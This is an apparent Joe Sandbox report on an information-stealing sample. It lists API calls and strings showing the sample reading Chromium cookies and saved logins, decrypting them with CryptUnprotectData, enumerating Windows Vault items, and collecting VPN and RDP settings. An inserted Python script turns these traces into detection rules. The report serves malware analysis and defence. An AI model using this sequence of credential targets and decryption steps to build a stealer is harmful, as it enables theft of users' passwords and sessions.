                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                        • String ID: last_visit_date$moz_places$table$url
                                                                        • API String ID: 2336645791-66087218
                                                                        • Opcode ID: 4c06316f0353d82960af59c760118a96eaa9d9ac5458cf65fb31cfba7c031be8
                                                                        • Instruction ID: 927ce64d228c71d5eecd2b41a155fb710e234b5e03530a406b498f786d78ede2
                                                                        • Opcode Fuzzy Hash: 4c06316f0353d82960af59c760118a96eaa9d9ac5458cf65fb31cfba7c031be8
                                                                        • Instruction Fuzzy Hash: 4931961260969281DE60EF2FE8505AAA390FF807E8F804032FE4D577A6DF7DD496C760
                                                                        APIs
                                                                          • Part of subcall function 00007FF7CB8725DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CB871985,?,?,?,00007FF7CB87155F), ref: 00007FF7CB8725E5
                                                                        • __memcpy.DELAYIMP ref: 00007FF7CB87F18B
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB880141
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB88014F
                                                                          • Part of subcall function 00007FF7CB87EB90: lstrlenA.KERNEL32 ref: 00007FF7CB87EBAD
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                        • String ID: last_visit_time$table$url$urls
                                                                        • API String ID: 2336645791-3896411411
                                                                        • Opcode ID: 0a42863f281ee6fe74cbd49d57002a5e8e3fc762b2f6cce6b126dc49bb499105
                                                                        • Instruction ID: a4a2f5e6393022144271974f7919036adccfdda2935741f2df874d21b7dc8085
                                                                        • Opcode Fuzzy Hash: 0a42863f281ee6fe74cbd49d57002a5e8e3fc762b2f6cce6b126dc49bb499105
                                                                        • Instruction Fuzzy Hash: 4831961161869381DE60EF2EE4505AAB390FB81BE8F804031FE4D57BA5DF3CD495D7A0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: AppendPathlstrcpy
                                                                        • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                        • API String ID: 3043196718-4231764533
                                                                        • Opcode ID: aa9ff1c84d4b7c8f3090ffa5ee34b20535206f5e98df821a65f4a5b75f9be73c
                                                                        • Instruction ID: bad5cda7cbde20cca8a6335c2f529e239cf7f14d506a6586de7671f8fcdca9c4
                                                                        • Opcode Fuzzy Hash: aa9ff1c84d4b7c8f3090ffa5ee34b20535206f5e98df821a65f4a5b75f9be73c
                                                                        • Instruction Fuzzy Hash: 6E31D172618B9182DA20FF29E4042E9A3A5FB88BE4F940132FE5C177A9CF3CD554C790
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: ?
                                                                        • API String ID: 1818849710-1684325040
                                                                        • Opcode ID: 3f699420e7c2bd9d5165ef801724a0e58f217ece520d4ca7f8f7086c4c226540
                                                                        • Instruction ID: a9ce25c87b3907caaa76ff3725ffe2035ae7756442d93e95b0b5941bc8ce6f3c
                                                                        • Opcode Fuzzy Hash: 3f699420e7c2bd9d5165ef801724a0e58f217ece520d4ca7f8f7086c4c226540
                                                                        • Instruction Fuzzy Hash: 4721A173A147908AE720AF75A8402EDBBE0FB5C7A8B940225EA8C07F59CF38C154CB50
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                        • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                        • API String ID: 784796242-1893226844
                                                                        • Opcode ID: 142641f8b7a49738de1f75f81717160bc999a6765c17e45e63aeae2f78436569
                                                                        • Instruction ID: 3f6f8923c7679da9ab11d587367f3a4b9d1bd4a16d94c6088a341c8522bbf0cf
                                                                        • Opcode Fuzzy Hash: 142641f8b7a49738de1f75f81717160bc999a6765c17e45e63aeae2f78436569
                                                                        • Instruction Fuzzy Hash: 5D11B11160869240D920FF19E8553FAD390EF84BE4FC05131F95D5B6BADF2CD195C7A0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                         • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                         • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Enum$CloseOpen
                                                                        • String ID:
                                                                        • API String ID: 1701607978-0
                                                                        • Opcode ID: 416c5c68e5041cda3919146f9132f3cad043645ab3bbea6a523ac74fa5a0f50e
                                                                        • Instruction ID: 2f8a7e447a61a5b819cab927f00ec75e51b0fdc87f4d6e0949ed0fac324310c1
                                                                        • Opcode Fuzzy Hash: 416c5c68e5041cda3919146f9132f3cad043645ab3bbea6a523ac74fa5a0f50e
                                                                        • Instruction Fuzzy Hash: 34216B33618B8582D3109F15E48476AB7B4F788B94F550236EB8C43B28CF3DD559CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Value$AppendPathlstrcpy
                                                                        • String ID: Software\Microsoft\Terminal Server Client\Servers
                                                                        • API String ID: 19203174-1233151749
                                                                        • Opcode ID: 37b6a1f4aac90ea7ac1389f132fae6e750dfaedc5a30334d59bc4a8f412dfbf4
                                                                        • Instruction ID: b38f3e56aff97931a10622350fdb92f9b5b6e1cda6dcf9b8f64d6cadf141d9c1
                                                                        • Opcode Fuzzy Hash: 37b6a1f4aac90ea7ac1389f132fae6e750dfaedc5a30334d59bc4a8f412dfbf4
                                                                        • Instruction Fuzzy Hash: D121F16261468285DB20FF25D8102EDA390FB88BE8FC44132FA4D1BBAADF3CD255C750
                                                                        APIs
                                                                        • GetEnvironmentVariableW.KERNEL32 ref: 00007FF7CB87FE0D
                                                                        • lstrcatW.KERNEL32 ref: 00007FF7CB87FE1A
                                                                          • Part of subcall function 00007FF7CB87FF38: lstrlenW.KERNEL32 ref: 00007FF7CB87FF5E
                                                                          • Part of subcall function 00007FF7CB87FF38: lstrlenW.KERNEL32 ref: 00007FF7CB87FF7A
                                                                          • Part of subcall function 00007FF7CB87FF38: WideCharToMultiByte.KERNEL32 ref: 00007FF7CB87FFA3
                                                                          • Part of subcall function 00007FF7CB87FF38: PathFileExistsA.SHLWAPI ref: 00007FF7CB87FFAC
                                                                          • Part of subcall function 00007FF7CB87FF38: OpenFile.KERNEL32 ref: 00007FF7CB87FFC5
                                                                          • Part of subcall function 00007FF7CB87FF38: GetFileSize.KERNEL32 ref: 00007FF7CB87FFE5
                                                                          • Part of subcall function 00007FF7CB87FF38: CreateFileMappingA.KERNEL32 ref: 00007FF7CB88001C
                                                                          • Part of subcall function 00007FF7CB87FF38: MapViewOfFile.KERNEL32 ref: 00007FF7CB88003D
                                                                          • Part of subcall function 00007FF7CB87FF38: __memcpy.DELAYIMP ref: 00007FF7CB88004F
                                                                          • Part of subcall function 00007FF7CB87FF38: UnmapViewOfFile.KERNEL32 ref: 00007FF7CB88005A
                                                                          • Part of subcall function 00007FF7CB87FF38: CloseHandle.KERNEL32 ref: 00007FF7CB880063
                                                                          • Part of subcall function 00007FF7CB87FF38: CloseHandle.KERNEL32 ref: 00007FF7CB88006C
                                                                          • Part of subcall function 00007FF7CB87F27C: __memcpy.DELAYIMP ref: 00007FF7CB87F29A
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
                                                                        • String ID: APPDATA
                                                                        • API String ID: 2395011915-4054820676
                                                                        • Opcode ID: 1c5aadbc771fdada102cf90f1d560a23c7010e43b89a1500ae84cb532174cc29
                                                                        • Instruction ID: 09546396ee01c6bcbd6b8aa3b81fd36aceca6f356a81ca2b093cce8f3206d3d7
                                                                        • Opcode Fuzzy Hash: 1c5aadbc771fdada102cf90f1d560a23c7010e43b89a1500ae84cb532174cc29
                                                                        • Instruction Fuzzy Hash: 95117F22628A9291EF10EF15E4405EDB3A1FB88798FC45031FA4D97A69EF3CD558C790
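The per-function records above list each API call in the form "<Api>.<Module> ref: <address>", with calls made inside a called routine prefixed by "Part of subcall function <address>:", followed by the function's string references. The script below is an added example, not part of the Joe Sandbox report: it parses that layout into a call sequence, groups calls by the sub-function they belong to, and matches two hypothetical behaviour rules written for this example (a %APPDATA% file read through a file mapping, and a reference to the RDP client's server MRU key). The sample listing is an abridged copy of the APPDATA function's calls shown above; the second sample contains only the registry string, because the report shows no call lines for that function, and none are invented here. The rule labels are ours, not Joe Sandbox signature names.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence, Tuple

# Constructed input: abridged copy of the %APPDATA% function's call lines above,
# in the report's own layout, embedded so the script runs offline.
SAMPLE_LISTING = """\
APIs
• GetEnvironmentVariableW.KERNEL32 ref: 00007FF7CB87FE0D
• lstrcatW.KERNEL32 ref: 00007FF7CB87FE1A
  • Part of subcall function 00007FF7CB87FF38: lstrlenW.KERNEL32 ref: 00007FF7CB87FF5E
  • Part of subcall function 00007FF7CB87FF38: WideCharToMultiByte.KERNEL32 ref: 00007FF7CB87FFA3
  • Part of subcall function 00007FF7CB87FF38: PathFileExistsA.SHLWAPI ref: 00007FF7CB87FFAC
  • Part of subcall function 00007FF7CB87FF38: OpenFile.KERNEL32 ref: 00007FF7CB87FFC5
  • Part of subcall function 00007FF7CB87FF38: GetFileSize.KERNEL32 ref: 00007FF7CB87FFE5
  • Part of subcall function 00007FF7CB87FF38: CreateFileMappingA.KERNEL32 ref: 00007FF7CB88001C
  • Part of subcall function 00007FF7CB87FF38: MapViewOfFile.KERNEL32 ref: 00007FF7CB88003D
  • Part of subcall function 00007FF7CB87FF38: __memcpy.DELAYIMP ref: 00007FF7CB88004F
  • Part of subcall function 00007FF7CB87FF38: UnmapViewOfFile.KERNEL32 ref: 00007FF7CB88005A
  • Part of subcall function 00007FF7CB87FF38: CloseHandle.KERNEL32 ref: 00007FF7CB880063
Strings
• String ID: APPDATA
• API String ID: 2395011915-4054820676
"""

# Constructed input for the registry-string function: only its string entry
# appears in the report, so no call lines are invented.
RDP_LISTING = """\
Strings
• String ID: Software\\Microsoft\\Terminal Server Client\\Servers
• API String ID: 19203174-1233151749
"""

CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# Only the function's own "String ID" entry, not the "API String ID" hash line.
STRING_RE = re.compile(r"(?<!API )String ID:[ \t]*(?P<value>.*\S)?")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    ref: int                 # address of the call site
    callee: Optional[int]    # sub-function containing the call, None if direct


def parse_listing(text: str) -> Tuple[List[ApiCall], List[str]]:
    """Return (calls in listing order, string references) for one record."""
    calls: List[ApiCall] = []
    strings: List[str] = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if m:
            callee = m.group("callee")
            calls.append(ApiCall(m.group("api"), m.group("module"),
                                 int(m.group("ref"), 16),
                                 int(callee, 16) if callee else None))
            continue
        m = STRING_RE.search(line)
        if m and m.group("value"):
            strings.append(m.group("value"))
    return calls, strings


def contains_in_order(names: Sequence[str], pattern: Sequence[str]) -> bool:
    """True if every API in `pattern` occurs in `names` in that relative order."""
    it = iter(names)
    return all(any(n == want for n in it) for want in pattern)


# Hypothetical rules for this example: ordered API subsequence plus required strings.
RULES: Dict[str, Dict[str, Sequence[str]]] = {
    "reads a file under %APPDATA% through a file mapping": {
        "apis": ("GetEnvironmentVariableW", "PathFileExistsA",
                 "CreateFileMappingA", "MapViewOfFile"),
        "strings": ("APPDATA",),
    },
    "references the RDP client MRU server list": {
        "apis": (),
        "strings": ("Terminal Server Client\\Servers",),
    },
}


def match_behaviours(calls: Sequence[ApiCall], strings: Sequence[str]) -> List[str]:
    names = [c.api for c in calls]
    hits = []
    for label, rule in RULES.items():
        api_ok = contains_in_order(names, rule["apis"])
        str_ok = all(any(need in s for s in strings) for need in rule["strings"])
        if api_ok and str_ok:
            hits.append(label)
    return hits


def subcall_groups(calls: Sequence[ApiCall]) -> Dict[Optional[int], List[str]]:
    """Group API names by the sub-function the report attributed them to."""
    groups: Dict[Optional[int], List[str]] = {}
    for c in calls:
        groups.setdefault(c.callee, []).append(c.api)
    return groups


if __name__ == "__main__":
    for text in (SAMPLE_LISTING, RDP_LISTING):
        calls, strings = parse_listing(text)
        for callee, apis in subcall_groups(calls).items():
            where = f"sub_{callee:X}" if callee is not None else "direct"
            print(f"{where}: {' -> '.join(apis)}")
        print("strings:", strings, "behaviours:", match_behaviours(calls, strings))
```

Ordered-subsequence matching is deliberate: the report lists calls in address order, so "MapViewOfFile before CreateFileMappingA" would not satisfy the first rule, which keeps a rule from firing on an unrelated function that merely imports the same APIs. Fuzzy-hash and Opcode ID lines are ignored because they identify code, not behaviour.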

                                                                        Execution Graph

                                                                        Execution Coverage:3.6%
                                                                        Dynamic/Decrypted Code Coverage:50.1%
                                                                        Signature Coverage:3.2%
                                                                        Total number of Nodes:784
                                                                        Total number of Limit Nodes:85
                                                                        [Execution graph omitted: the interactive call-graph view was flattened into node IDs and edge pairs such as "28025->28026", which carry no information outside the viewer. The node labels that survive name the following routines and API sequences:]
                                                                        • 32d9304 and 32d9238: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualProtect (import resolution and section-protection changes, consistent with an unpacking stub)
                                                                        • 3273717, 3273c40 and 3273098: GetTempPathW, GetTempFileNameW, DeleteFileW, CopyFileW, then RtlCompareMemory, RtlZeroMemory, wsprintfA, lstrcat and a final DeleteFileW; 3273717 and 3273098 also call CryptUnprotectData (a file is copied to a temporary path, parsed, DPAPI blobs in it are decrypted, and the copy is removed)
                                                                        • 3273e04 with 3271c31, 3272fb1 and 327123b: CreateFileW, GetFileSize, ReadFile, StrStrIA, CryptStringToBinaryA, RtlCompareMemory, CryptUnprotectData (reads a file, locates a field by substring, decodes it with CryptStringToBinaryA and DPAPI-decrypts the result)
                                                                        • 3272b15, 3273ed9 and 3271d4a: FindFirstFileW, FindNextFileW, FindClose, lstrcmpiW, StrStrIW, PathCombineW, RtlComputeCrc32; 3273ed9 and 3271d4a call themselves (recursive directory walk comparing names by CRC32)
                                                                        • 32719e5, 3272e30 and 3274317: RegOpenKeyExW or RegOpenKeyW, RegQueryValueExW, RegEnumKeyExW, RegCloseKey (registry key enumeration and value reads)
                                                                        • 3272198: RtlZeroMemory, GetVersionExW, LoadLibraryW, five GetProcAddress calls, RtlCompareMemory, StrStrIW, FreeLibrary
                                                                        • 3272cb5: GetPrivateProfileSectionNamesW, GetPrivateProfileStringW, GetPrivateProfileIntW (INI-file parsing)
                                                                        • 3271333, 32715dd and 3271198: MultiByteToWideChar, wsprintfW, VirtualAlloc, RtlMoveMemory, lstrcat, CryptBinaryToStringA (string conversion and encoding of collected data)
                                                                        • 327b1e5: CreateFileMappingW, MapViewOfFile; 327a67c: SetFilePointer, SetEndOfFile; 3271afe: SHGetFolderPathW; 327bfec: GetSystemInfo; 3279fc8: HeapCreate; 32c55eb: IsProcessorFeaturePresent; 32724a4 and 3271b9d: GetFileAttributesW; 327105d: VirtualFree
88 API calls 28587 3274cf5 memset 28487 32a9ef6 114 API calls 28588 32913ca 89 API calls 27869 32728f8 27870 3272900 27869->27870 27871 3272ac8 27869->27871 27904 3271000 GetProcessHeap RtlAllocateHeap 27870->27904 27901 32c3848 27871->27901 27874 327290e 27905 32902ec 94 API calls 27874->27905 27877 3271011 3 API calls 27878 3272adf 27877->27878 27880 3272a98 lstrlen 27881 3272aa4 27880->27881 27882 3272ac1 27880->27882 27910 3271798 lstrlen 27881->27910 27884 3271011 3 API calls 27882->27884 27884->27871 27885 3272ab1 27911 3271798 lstrlen 27885->27911 27887 3272ab9 27912 3271798 lstrlen 27887->27912 27889 3271fa7 19 API calls 27890 3272919 27889->27890 27890->27889 27891 32729da lstrlen 27890->27891 27895 3272a8b 27890->27895 27906 3271000 GetProcessHeap RtlAllocateHeap 27890->27906 27907 3272112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27890->27907 27908 32902ec 94 API calls 27890->27908 27891->27890 27892 32729eb lstrlen 27891->27892 27892->27890 27909 328fb92 93 API calls 27895->27909 27897 3272a25 wsprintfA lstrlen 27898 3272a6a lstrcat 27897->27898 27899 3272a58 27897->27899 27900 3271011 3 API calls 27898->27900 27899->27898 27900->27890 27913 32c37cb 27901->27913 27904->27874 27905->27890 27906->27890 27907->27897 27908->27890 27909->27880 27910->27885 27911->27887 27912->27882 27914 32c37d6 27913->27914 27915 3272ad1 DeleteFileW 27913->27915 27925 32795b5 17 API calls 27914->27925 27915->27877 27917 32c37db 27918 32c37df 27917->27918 27921 32c37eb 27917->27921 27926 32c4da0 17 API calls 27918->27926 27920 32c3834 27928 32c3865 71 API calls 27920->27928 27921->27920 27923 32c381f 27921->27923 27927 3278795 22 API calls 27923->27927 27925->27917 27926->27915 27927->27915 27928->27915 28589 3275cc5 22 API calls 28590 3285cca 32 API calls 28489 329faca _allmul strcspn 28591 32c34ca 57 API calls 28594 3276eb7 22 API calls 28494 329c6da 23 API calls 28595 32a70de 24 API calls

                                                                        Control-flow Graph
                                                                        Function 03273717-03273C3D (Chromium cookie database export, per the strings below): basic-block graph with executed/not-executed colouring omitted; its nodes reduce to the API calls listed under APIs.
                                                                        APIs
                                                                          • Part of subcall function 03271B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                          • Part of subcall function 03271B6A: CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 03273778
                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03273782
                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 03273789
                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03273794
                                                                        • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0327383B
                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 03273870
                                                                        • lstrlen.KERNEL32(?,?,?,?,?), ref: 0327398B
                                                                        • lstrlen.KERNEL32(00000000), ref: 0327399A
                                                                        • wsprintfA.USER32 ref: 032739F1
                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 032739FD
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 03273A21
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03273A49
                                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03273B13
                                                                        • lstrlen.KERNEL32(00000000), ref: 03273B22
                                                                        • wsprintfA.USER32 ref: 03273B79
                                                                        • lstrlen.KERNEL32(00000000), ref: 03273B85
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 03273BA9
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 03273BDA
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03273C16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                        • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                        • API String ID: 584740257-404540950
                                                                        • Opcode ID: bf4901f002e0fd683010ea7a78a0e497feab46610f869bf5b6af95a42adb82cc
                                                                        • Instruction ID: 59112e4d3581670a9b9d44edaaf76fc1725bba19cf7a6ed9b7ebd9565076a4e5
                                                                        • Opcode Fuzzy Hash: bf4901f002e0fd683010ea7a78a0e497feab46610f869bf5b6af95a42adb82cc
                                                                        • Instruction Fuzzy Hash: A2E1CF74228342AFD711EF25C844A2FBBE9BFC5744F08892CF6858B250DB75D885DB92

                                                                        Control-flow Graph
                                                                        Function 03272198-032724A3 (Windows Vault enumeration through vaultcli.dll, per the strings below): basic-block graph with executed/not-executed colouring omitted; its nodes reduce to the API calls listed under APIs.
                                                                        APIs
                                                                        • RtlZeroMemory.NTDLL(?,00000114), ref: 032721AF
                                                                        • GetVersionExW.KERNEL32(?), ref: 032721BE
                                                                        • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 032721E8
                                                                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0327220A
                                                                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 03272214
                                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 03272220
                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0327222A
                                                                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 03272236
                                                                        • RtlCompareMemory.NTDLL(?,032D1110,00000010), ref: 032722E8
                                                                        • RtlCompareMemory.NTDLL(?,032D1110,00000010), ref: 0327236C
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                        • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 032723FE
                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 03272493
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                        • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                        • API String ID: 2583887280-2831467701
                                                                        • Opcode ID: 828eb7538eda034c38da703f63d568017daf4ec6bbf05fec29e4d57e1d2ed2fb
                                                                        • Instruction ID: d51fb76a071cdcac1726bba0b242a5040b55b412088a58db601af5b36df5acb2
                                                                        • Opcode Fuzzy Hash: 828eb7538eda034c38da703f63d568017daf4ec6bbf05fec29e4d57e1d2ed2fb
                                                                        • Instruction Fuzzy Hash: F3919F71A28341DFD714DF65C894A2FBBE9BFC8604F08882DF59597251DBB0E881CB52

                                                                        Control-flow Graph
                                                                        Function 03273098-032733C0 (Chromium login database export, per the strings below): basic-block graph with executed/not-executed colouring omitted; its nodes reduce to the API calls listed under APIs.
                                                                        APIs
                                                                          • Part of subcall function 03271B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
